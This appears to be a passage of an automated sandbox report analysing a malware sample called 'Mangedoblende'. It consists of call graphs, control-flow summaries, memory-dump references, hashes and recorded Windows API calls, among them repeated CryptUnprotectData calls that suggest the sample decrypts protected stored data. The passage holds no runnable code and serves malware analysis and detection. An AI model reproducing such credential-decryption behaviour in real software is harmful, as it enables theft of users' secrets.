228374a7 70486->70281 70487->70485 70487->70486 70488 225b9318 2 API calls 70487->70488 70489 225b9328 LdrInitializeThunk 70487->70489 70490 225b9548 2 API calls 70487->70490 70491 225b992c 2 API calls 70487->70491 70488->70486 70489->70486 70490->70486 70491->70486 70493 228373fc 70492->70493 70494 228374a7 70493->70494 70495 225b9318 2 API calls 70493->70495 70496 225b9328 LdrInitializeThunk 70493->70496 70497 225b9548 2 API calls 70493->70497 70498 225b992c 2 API calls 70493->70498 70494->70281 70495->70494 70496->70494 70497->70494 70498->70494 70500 2283d42c 70499->70500 70501 2283d4d7 70500->70501 70502 225b9318 2 API calls 70500->70502 70503 225b9328 LdrInitializeThunk 70500->70503 70504 225b9548 2 API calls 70500->70504 70505 225b992c 2 API calls 70500->70505 70501->70282 70502->70501 70503->70501 70504->70501 70505->70501 70507 2283d410 70506->70507 70508 2283d4d7 70507->70508 70509 225b9318 2 API calls 70507->70509 70510 225b9328 LdrInitializeThunk 70507->70510 70511 225b9548 2 API calls 70507->70511 70512 225b992c 2 API calls 70507->70512 70508->70282 70509->70508 70510->70508 70511->70508 70512->70508 70514 225b933a 70513->70514 70516 225b933f 70513->70516 70514->70315 70515 225b9a69 LdrInitializeThunk 70515->70514 70516->70514 70516->70515 70522 225b9579 70517->70522 70518 225b96d9 70518->70315 70519 225b9924 LdrInitializeThunk 70519->70518 70521 225b9328 LdrInitializeThunk 70521->70522 70522->70518 70522->70519 70522->70521 70524 225b97e3 70523->70524 70526 225b9924 LdrInitializeThunk 70524->70526 70528 225b9328 LdrInitializeThunk 70524->70528 70527 225b9a81 70526->70527 70527->70315 70528->70524 70530 225b933a 70529->70530 70534 225b933f 70529->70534 70530->70315 70531 225b9924 LdrInitializeThunk 70531->70530 70533 225b9328 LdrInitializeThunk 70533->70534 70534->70530 70534->70531 70534->70533 70536 227a8440 70535->70536 70540 227a8a59 70536->70540 70548 227a8a68 70536->70548 70537 227a84b0 70537->70346 70541 227a8a5c 70540->70541 70542 227a8b41 
70541->70542 70546 227a8a68 CryptUnprotectData 70541->70546 70547 227a8a59 CryptUnprotectData 70541->70547 70556 227a8c4a 70541->70556 70560 227a87c0 70542->70560 70546->70542 70547->70542 70549 227a8b41 70548->70549 70550 227a8a8d 70548->70550 70551 227a87c0 CryptUnprotectData 70549->70551 70550->70549 70553 227a8c4a CryptUnprotectData 70550->70553 70554 227a8a68 CryptUnprotectData 70550->70554 70555 227a8a59 CryptUnprotectData 70550->70555 70552 227a8d0d 70551->70552 70552->70537 70553->70549 70554->70549 70555->70549 70557 227a8c5d 70556->70557 70558 227a87c0 CryptUnprotectData 70557->70558 70559 227a8d0d 70558->70559 70559->70542 70561 227a8ef8 CryptUnprotectData 70560->70561 70562 227a8d0d 70561->70562 70562->70537 70563 225b9c18 70564 225b9c1f 70563->70564 70566 225b9c25 70563->70566 70565 225b9328 LdrInitializeThunk 70564->70565 70564->70566 70568 225b9fa6 70564->70568 70565->70568 70567 225b9328 LdrInitializeThunk 70567->70568 70568->70566 70568->70567 70569 22936cf0 70570 22936d58 CreateWindowExW 70569->70570 70572 22936e14 70570->70572 70643 229cbfe8 70644 229cc02e GetCurrentProcess 70643->70644 70646 229cc079 70644->70646 70647 229cc080 GetCurrentThread 70644->70647 70646->70647 70648 229cc0bd GetCurrentProcess 70647->70648 70649 229cc0b6 70647->70649 70650 229cc0f3 70648->70650 70649->70648 70651 229cc11b GetCurrentThreadId 70650->70651 70652 229cc14c 70651->70652 70573 2293b5f8 70574 2293b900 70573->70574 70575 2293b620 70573->70575 70576 2293b629 70575->70576 70579 2293aac4 70575->70579 70578 2293b64c 70578->70578 70580 2293aacf 70579->70580 70581 2293b943 70580->70581 70583 2293aae0 70580->70583 70581->70578 70584 2293b978 OleInitialize 70583->70584 70585 2293b9dc 70584->70585 70585->70581 70586 229cc230 DuplicateHandle 70587 229cc2c6 70586->70587 70588 ad044 70590 ad05c 70588->70590 70589 ad0b6 70590->70589 70595 22936ea8 70590->70595 70599 22936e99 70590->70599 70603 229342cc 70590->70603 70611 22937bf8 70590->70611 70596 22936ece 70595->70596 
70597 229342cc CallWindowProcW 70596->70597 70598 22936eef 70597->70598 70598->70589 70600 22936ece 70599->70600 70601 229342cc CallWindowProcW 70600->70601 70602 22936eef 70601->70602 70602->70589 70604 229342d7 70603->70604 70605 22937c69 70604->70605 70607 22937c59 70604->70607 70608 22937c67 70605->70608 70629 229343f4 70605->70629 70619 22937d81 70607->70619 70624 22937d90 70607->70624 70615 22937c35 70611->70615 70612 22937c69 70613 22937c67 70612->70613 70614 229343f4 CallWindowProcW 70612->70614 70614->70613 70615->70612 70616 22937c59 70615->70616 70617 22937d81 CallWindowProcW 70616->70617 70618 22937d90 CallWindowProcW 70616->70618 70617->70613 70618->70613 70621 22937d90 70619->70621 70620 22937e30 70620->70608 70633 22937e48 70621->70633 70636 22937e38 70621->70636 70626 22937da4 70624->70626 70625 22937e30 70625->70608 70627 22937e38 CallWindowProcW 70626->70627 70628 22937e48 CallWindowProcW 70626->70628 70627->70625 70628->70625 70630 229343ff 70629->70630 70631 229394ca CallWindowProcW 70630->70631 70632 22939479 70630->70632 70631->70632 70632->70608 70634 22937e59 70633->70634 70640 22939402 70633->70640 70634->70620 70637 22937e48 70636->70637 70638 22937e59 70637->70638 70639 22939402 CallWindowProcW 70637->70639 70638->70620 70639->70638 70641 229343f4 CallWindowProcW 70640->70641 70642 2293941a 70641->70642 70642->70634

Control-flow Graph
control_flow_graph (basic-block dump condensed): function spanning 18c146-18c413, entry block 18c146-18c158; block 18c1cf-18c2ac calls 1841a0 and 183cc0, block 18c2b3-18c2d4 calls 185658; back edge 18c39f-18c3bc -> 18c3bd-18c3d4 forms a loop over 18c359-18c3bc; last block 18c413
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
• API String ID: 0-2617784740
• Opcode ID: 70f98ae4a775a6f586f4ed09efbc9311621c1bce2b202305dbe95625f6bf8f2b
• Instruction ID: 6a0217494450f35bc21c7fafe8eca1bb9068cf822fc3c1b43d7e801c3e828e1e
• Opcode Fuzzy Hash: 70f98ae4a775a6f586f4ed09efbc9311621c1bce2b202305dbe95625f6bf8f2b
• Instruction Fuzzy Hash: 0CA1C674E04618DFDB54DFA9C884A9DBBF2BF89310F15C06AE819AB361DB349941CF60

Control-flow Graph
control_flow_graph (basic-block dump condensed): function spanning 18c442-18c6e3, entry block 18c470-18c471 (branching to 18c442-18c45e or 18c473-18c498); block 18c49f-18c57c calls 1841a0 and 183cc0, block 18c583-18c5a4 calls 185658; back edge 18c66f-18c68c -> 18c68d-18c6a4 forms a loop over 18c629-18c68c; last block 18c6e3
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
• API String ID: 0-2617784740
• Opcode ID: e0e5d99eeea6eabd0f2b0f2e9cc39155b9b030da925a662d40d00a6d82c2c4f4
• Instruction ID: da355c7c5db58fca4a7bd8db334ac5a5b4a14ab7a59e2d1a9d9eaed5751d7821
• Opcode Fuzzy Hash: e0e5d99eeea6eabd0f2b0f2e9cc39155b9b030da925a662d40d00a6d82c2c4f4
• Instruction Fuzzy Hash: C691A474E00218DFDB58DFAAD944A9DBBF2FF88300F259069E419AB365EB349941CF50

Control-flow Graph
control_flow_graph (basic-block dump condensed): function spanning 185362-1855ec, entry block 185362-185364; block 1853c4-185484 calls 1841a0 and 183cc0; from 18548b-1854a9 the graph records two alternative call blocks at 1854ac, one calling 185658 and one calling 185649; back edge 185578-185595 -> 185596-1855ad forms a loop over 185532-185595; last block 1855ec
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
• API String ID: 0-2617784740
• Opcode ID: cce358f22442a6299ec6ae90e89a3cb4ea4767a1bc0b860147a16757e4f98466
• Instruction ID: 767092c9062031510e4b8b46128c2b9fed017a3a84df686fd74545f7d4784cc6
• Opcode Fuzzy Hash: cce358f22442a6299ec6ae90e89a3cb4ea4767a1bc0b860147a16757e4f98466
• Instruction Fuzzy Hash: 0A91B574E00618DFDB14DFA9C984A9DBBF2FF89300F25906AE809AB365DB349945CF50

Control-flow Graph
control_flow_graph (basic-block dump condensed): function spanning 18ca0f-18cc83, entry block 18ca0f-18ca14; block 18ca6d-18cb1c calls 1841a0 and 183cc0, block 18cb23-18cb44 calls 185658; back edge 18cc0f-18cc2c -> 18cc2d-18cc44 forms a loop over 18cbc9-18cc2c; last block 18cc83
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
• API String ID: 0-2617784740
• Opcode ID: 0aceef73e0be682db0beb8cc650b224ecff79ed4523a58e521421a5524930beb
• Instruction ID: 50b10b4527bf3dfb1dd57559c286fb2194a7e91ce76e9c72f9cad093a8042821
• Opcode Fuzzy Hash: 0aceef73e0be682db0beb8cc650b224ecff79ed4523a58e521421a5524930beb
• Instruction Fuzzy Hash: 9481B774E04618CFDB58DFAAD884A9DBBF2BF89300F24C069E419AB365DB349945CF50

Control-flow Graph
control_flow_graph (basic-block dump condensed): function spanning 18d27d-18d4f3, entry block 18d27d-18d2a8; block 18d2af-18d38c calls 1841a0 and 183cc0, block 18d393-18d3b4 calls 185658; back edge 18d47f-18d49c -> 18d49d-18d4b4 forms a loop over 18d439-18d49c; last block 18d4f3
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
• API String ID: 0-2617784740
• Opcode ID: 22a919302527b4652fccb10c39ac85abe10e28d4ac195bb7f6456882f877043d
• Instruction ID: ce9436cbb5334a515163b4e2d843254cf64887d803e27a791c601a06fd231225
• Opcode Fuzzy Hash: 22a919302527b4652fccb10c39ac85abe10e28d4ac195bb7f6456882f877043d
• Instruction Fuzzy Hash: AC81B774E00218DFDB54DFAAD884A9DBBF2BF89300F24C069E819AB365DB349945CF50

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1609 18c738-18c768 1610 18c76a 1609->1610 1611 18c76f-18c84c call 1841a0 call 183cc0 1609->1611 1610->1611 1621 18c84e 1611->1621 1622 18c853-18c874 call 185658 1611->1622 1621->1622 1624 18c879-18c884 1622->1624 1625 18c88b-18c88f 1624->1625 1626 18c886 1624->1626 1627 18c891-18c892 1625->1627 1628 18c894-18c89b 1625->1628 1626->1625 1629 18c8b3-18c8f7 1627->1629 1630 18c89d 1628->1630 1631 18c8a2-18c8b0 1628->1631 1635 18c95d-18c974 1629->1635 1630->1631 1631->1629 1637 18c8f9-18c90f 1635->1637 1638 18c976-18c99b 1635->1638 1642 18c939 1637->1642 1643 18c911-18c91d 1637->1643 1644 18c99d-18c9b2 1638->1644 1645 18c9b3 1638->1645 1648 18c93f-18c95c 1642->1648 1646 18c91f-18c925 1643->1646 1647 18c927-18c92d 1643->1647 1644->1645 1649 18c937 1646->1649 1647->1649 1648->1635 1649->1648
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: f563a125664e907428fcf45bb6964b04e0722e2d4b0c43b8932b3eea068e5d02
                                                                                                                                                                            • Instruction ID: decb27ff73246f836036c98f8a177a11947e34c4c81381e8c06690ac634a82a8
                                                                                                                                                                            • Opcode Fuzzy Hash: f563a125664e907428fcf45bb6964b04e0722e2d4b0c43b8932b3eea068e5d02
                                                                                                                                                                            • Instruction Fuzzy Hash: 8681B574E00218DFDB18DFAAD984A9DBBF2BF89300F24D069E419AB365DB349941CF50

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1653 18cfa9-18cfd8 1654 18cfda 1653->1654 1655 18cfdf-18d0bc call 1841a0 call 183cc0 1653->1655 1654->1655 1665 18d0be 1655->1665 1666 18d0c3-18d0e4 call 185658 1655->1666 1665->1666 1668 18d0e9-18d0f4 1666->1668 1669 18d0fb-18d0ff 1668->1669 1670 18d0f6 1668->1670 1671 18d101-18d102 1669->1671 1672 18d104-18d10b 1669->1672 1670->1669 1673 18d123-18d167 1671->1673 1674 18d10d 1672->1674 1675 18d112-18d120 1672->1675 1679 18d1cd-18d1e4 1673->1679 1674->1675 1675->1673 1681 18d169-18d17f 1679->1681 1682 18d1e6-18d20b 1679->1682 1686 18d1a9 1681->1686 1687 18d181-18d18d 1681->1687 1688 18d20d-18d222 1682->1688 1689 18d223 1682->1689 1692 18d1af-18d1cc 1686->1692 1690 18d18f-18d195 1687->1690 1691 18d197-18d19d 1687->1691 1688->1689 1693 18d1a7 1690->1693 1691->1693 1692->1679 1693->1692
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: 43027e1db962a151873e8b952a540f7784a0887baf1941da7224bcfb107739d0
                                                                                                                                                                            • Instruction ID: c5ae682c88fad3439f84da11bd7347cc8c6b91f1771ea417f5559b1b2f57e14c
                                                                                                                                                                            • Opcode Fuzzy Hash: 43027e1db962a151873e8b952a540f7784a0887baf1941da7224bcfb107739d0
                                                                                                                                                                            • Instruction Fuzzy Hash: C981A574E00218DFDB58DFAAD884A9DBBF2BF88300F24C069E419AB365DB349941CF50

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1741 18cce1-18cd08 1742 18cd0a 1741->1742 1743 18cd0f-18cdec call 1841a0 call 183cc0 1741->1743 1742->1743 1753 18cdee 1743->1753 1754 18cdf3-18ce14 call 185658 1743->1754 1753->1754 1756 18ce19-18ce24 1754->1756 1757 18ce2b-18ce2f 1756->1757 1758 18ce26 1756->1758 1759 18ce31-18ce32 1757->1759 1760 18ce34-18ce3b 1757->1760 1758->1757 1761 18ce53-18ce97 1759->1761 1762 18ce3d 1760->1762 1763 18ce42-18ce50 1760->1763 1767 18cefd-18cf14 1761->1767 1762->1763 1763->1761 1769 18ce99-18ceaf 1767->1769 1770 18cf16-18cf3b 1767->1770 1774 18ced9 1769->1774 1775 18ceb1-18cebd 1769->1775 1776 18cf3d-18cf52 1770->1776 1777 18cf53 1770->1777 1780 18cedf-18cefc 1774->1780 1778 18cebf-18cec5 1775->1778 1779 18cec7-18cecd 1775->1779 1776->1777 1781 18ced7 1778->1781 1779->1781 1780->1767 1781->1780
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: 4936b1e236d9cf7c431619948daa530a9d45b19c9f89523230e8eae62e1bb0fd
                                                                                                                                                                            • Instruction ID: cb469cb5fca0446b8b761a3856e90d754822cdc3a64839a9a76c73600f097178
                                                                                                                                                                            • Opcode Fuzzy Hash: 4936b1e236d9cf7c431619948daa530a9d45b19c9f89523230e8eae62e1bb0fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 0081A474E00218DFDB54DFAAD984A9DBBF2BF88300F24C169E419AB365DB349985CF50
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Xiq$Xiq$Xiq$Xiq
                                                                                                                                                                            • API String ID: 0-4026295062
                                                                                                                                                                            • Opcode ID: 42118b826b0b4255f6fc4d30f78d8004d4186f48e384f38c7a889c669ea2241e
                                                                                                                                                                            • Instruction ID: 0f99311c3f1b04d070d6db8312d7ae6535274d3ff9b5e4ba30f72c07dd4e6550
                                                                                                                                                                            • Opcode Fuzzy Hash: 42118b826b0b4255f6fc4d30f78d8004d4186f48e384f38c7a889c669ea2241e
                                                                                                                                                                            • Instruction Fuzzy Hash: 1802CE3584E3D44EC7634B798464296BFB0DF47A20B1E05EFC8C18B563E6295A4CCBA2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq$(oeq$,iq$,iq
                                                                                                                                                                            • API String ID: 0-2093320806
                                                                                                                                                                            • Opcode ID: 735ebe9094e0fa448e3a48ab1b7c53737b0ab669ba9f178154c7a411de2f14c7
                                                                                                                                                                            • Instruction ID: dc57c3c4159f7e4ae6d796d465feee496cf1ecc5a2103ed331780207b1bce297
                                                                                                                                                                            • Opcode Fuzzy Hash: 735ebe9094e0fa448e3a48ab1b7c53737b0ab669ba9f178154c7a411de2f14c7
                                                                                                                                                                            • Instruction Fuzzy Hash: F0024171A08219DFCB15EF68C884AADBBF2FF49300F258059E815AB2A1D734EE41DF51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq$Hiq
                                                                                                                                                                            • API String ID: 0-1760408109
                                                                                                                                                                            • Opcode ID: 552470a0d8db3f839e336cb8ffc3fc9d6be02dbc0e3253e0e488b3a624be7e37
                                                                                                                                                                            • Instruction ID: fc3cbd556aa4de9721af9da967ad360a38013a882573537b023b8bbd49a33357
                                                                                                                                                                            • Opcode Fuzzy Hash: 552470a0d8db3f839e336cb8ffc3fc9d6be02dbc0e3253e0e488b3a624be7e37
                                                                                                                                                                            • Instruction Fuzzy Hash: E2024E70B002199FDB15EF69C854AAEBBB6BF88300F208559E945DB395DF349E41CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Xiq$$eq
                                                                                                                                                                            • API String ID: 0-3760103188
                                                                                                                                                                            • Opcode ID: e09e7adba72fa3b6e535752de03eeec327e543786a05d5b29687530ecd020f73
                                                                                                                                                                            • Instruction ID: 1bbdf541af034d312ce9a108b4b5e102c036cf9fb7ac86c33e41f5d6b48935f3
                                                                                                                                                                            • Opcode Fuzzy Hash: e09e7adba72fa3b6e535752de03eeec327e543786a05d5b29687530ecd020f73
                                                                                                                                                                            • Instruction Fuzzy Hash: 0391C474B04319DBDB0CABB898542BFBBB7BFC8700B158A1DE502E7294DF3499019B95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0c57149cca785dfb70b85e44c7fbff2f3220fa8b15e364fef6e8c765584db8be
                                                                                                                                                                            • Instruction ID: a0aec2e279bd0f7b186ed7ec6e05d19a403b0dfd5872c969b7bcb38c67cf7de7
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c57149cca785dfb70b85e44c7fbff2f3220fa8b15e364fef6e8c765584db8be
                                                                                                                                                                            • Instruction Fuzzy Hash: 03222A74E002198FDB24DFA9C984B9DBBB2BF89304F10C5A9D409AB395DB359E85CF50
                                                                                                                                                                            APIs
                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 227A8F5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                                            • String ID:
• API String ID: 834300711-0
• Opcode ID: 26767c599ac5e2781cacc615f54946ac5cd47ae60f8e90747a1b81fe0ecec049
• Instruction ID: 842f0ee1092fbe27d40e13da7f62f0f04454f651ba801ff7580cb879a5afd085
• Opcode Fuzzy Hash: 26767c599ac5e2781cacc615f54946ac5cd47ae60f8e90747a1b81fe0ecec049
• Instruction Fuzzy Hash: 7421ACB2800249DFCB10CFA9C985BDEBFF1EF48320F14845AE958A7201C339A550DFA0
APIs
• CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 227A8F5D
Memory Dump Source
• Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
• Opcode ID: d22d70882f7a2081bf4a1a621eca2ceb43f57d44802dc67091e6df896a1f1444
• Instruction ID: fd13c0b0105a7770527e7e61775c1729d5070ccba04e56d57899bc810c9e76ce
• Opcode Fuzzy Hash: d22d70882f7a2081bf4a1a621eca2ceb43f57d44802dc67091e6df896a1f1444
• Instruction Fuzzy Hash: 231114B6804249DFDB10CF99C944BDEBFF5EF48320F148459EA18A7211C379A950DFA5
Memory Dump Source
• Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff65e8dc05f4788c6dd7bafec02fe28b326de4615585c6b701ae103d09d949b2
• Instruction ID: 07910404a61ca01e6f94583b41e3cffb2a7967ab1e594a3130b3549948042c63
• Opcode Fuzzy Hash: ff65e8dc05f4788c6dd7bafec02fe28b326de4615585c6b701ae103d09d949b2
• Instruction Fuzzy Hash: D5825C74E012288FDB65DF69C994BDDBBB2AF89300F1081E9E90DA7265DB355E81CF40
Memory Dump Source
• Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bc314a0bcd879f8343084e3d127838100832cf9822a3dc05407370c4fe6bf136
• Instruction ID: a398d0a20c1b93d1f4b5c9c6133400c057568e49275049b3941021bf141cee7f
• Opcode Fuzzy Hash: bc314a0bcd879f8343084e3d127838100832cf9822a3dc05407370c4fe6bf136
• Instruction Fuzzy Hash: CF72BC74E052298FDB64DF69C984BDDBBB2BF49304F1491E9D408A7265EB34AE81CF40
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53865184edffa9e7e25d2672b66b836ce43d9978766a6dd696f7be24dc012fac
• Instruction ID: 9ccf45a147cad36e729619693be06d33dd1abcf94539dfb31626d79db53f46d1
• Opcode Fuzzy Hash: 53865184edffa9e7e25d2672b66b836ce43d9978766a6dd696f7be24dc012fac
• Instruction Fuzzy Hash: F0E1C0B4D00218CFDB25DFA5C944B9DBBB2BF89304F6081A9D508BB3A5DB359A85CF14
Memory Dump Source
• Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4800c58197d24d232a5bb66eaaa2e230c7d8c060e139d11dc3b0250a4e41589d
• Instruction ID: 45c32c23072f32e33cb3d2da4ff7e137774fdcb5d6d4274c8ea8852f77d97f76
• Opcode Fuzzy Hash: 4800c58197d24d232a5bb66eaaa2e230c7d8c060e139d11dc3b0250a4e41589d
• Instruction Fuzzy Hash: C6E1B174E05218CFDB54DFA5C994B9DBBB2BF89304F2081A9D408A7395DB359A85CF10
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 222f0bc24497495e0810c9798f2d1042290f1b4d961374cd9ad7c430190e4263
• Instruction ID: efcbf89b9ee1ebaf50919a16a46e19e1d1c3a8e011856617db691116fd4034b1
• Opcode Fuzzy Hash: 222f0bc24497495e0810c9798f2d1042290f1b4d961374cd9ad7c430190e4263
• Instruction Fuzzy Hash: AAD18F74E05318CFDB15DFA5C984B9DBBB2BF89300F2081A9D508A72A5DB349E81DF51
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 546c932f00102b2fbede699fd29b24bdf9fafddc859d7d1b2e36be14b44d0866
• Instruction ID: 5d4e93b89bd663ae81a905d28afde59d6088a435e754f8f8665f3b58acaf7867
• Opcode Fuzzy Hash: 546c932f00102b2fbede699fd29b24bdf9fafddc859d7d1b2e36be14b44d0866
• Instruction Fuzzy Hash: 13D18F74E04318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
Memory Dump Source
• Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7399bbd5a2f57174129faac221e9dadad7aab59db599c0bf7a61c8b598d39224
